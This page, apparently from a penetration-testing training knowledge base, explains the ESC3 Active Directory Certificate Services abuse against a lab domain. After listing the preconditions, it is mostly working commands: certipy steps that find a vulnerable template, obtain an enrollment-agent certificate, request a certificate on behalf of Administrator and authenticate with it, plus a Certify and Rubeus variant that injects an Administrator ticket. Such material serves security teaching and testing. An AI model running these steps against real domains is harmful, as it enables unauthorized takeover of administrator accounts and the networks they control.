Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter IV - Active Directory / 04. Techniques / ADCS / Techniques

ESC3

ESC3 abuses a template that issues Certificate Request Agent certificates. We enroll for the agent certificate, then use it to request a certificate on behalf of another principal.

Conditions

Requester can enroll in the agent template.
Agent template has Certificate Request Agent EKU.
Manager approval is not required.
Authorized signatures required is 0.
A target template exists that allows enrollment-agent requests and supports authentication.

Find ESC3

certipy find -u 'student@ootw.local' -p 'student' -dc-ip 10.10.10.200 -vulnerable -enabled -stdout

Request agent certificate

certipy req -u 'student@ootw.local' -p 'student' -dc-ip 10.10.10.200 -ca 'OOTW-CA' -template ESC3 -out agent

Request certificate on behalf of Administrator

certipy req -u 'student@ootw.local' -p 'student' -dc-ip 10.10.10.200 -ca 'OOTW-CA' -template User -on-behalf-of 'OOTW\Administrator' -pfx agent.pfx -out administrator

Authenticate

certipy auth -pfx administrator.pfx -domain ootw.local -dc-ip 10.10.10.200
export KRB5CCNAME=administrator.ccache
klist

Windows with Certify

$AgentPfxB64 = "AGENT_PFX_B64"
$AdminCertB64 = "ADMIN_CERT_B64"

Certify.exe request --ca "dc01.ootw.local\OOTW-CA" --template ESC3 --quiet

Certify.exe request-agent --ca "dc01.ootw.local\OOTW-CA" --template User --target Administrator --agent-pfx $AgentPfxB64 --quiet

Rubeus.exe asktgt /user:Administrator /domain:ootw.local /certificate:$AdminCertB64 /ptt

Notes

The first certificate represents the request agent. The second certificate represents the target user. The target certificate is the one used for authentication.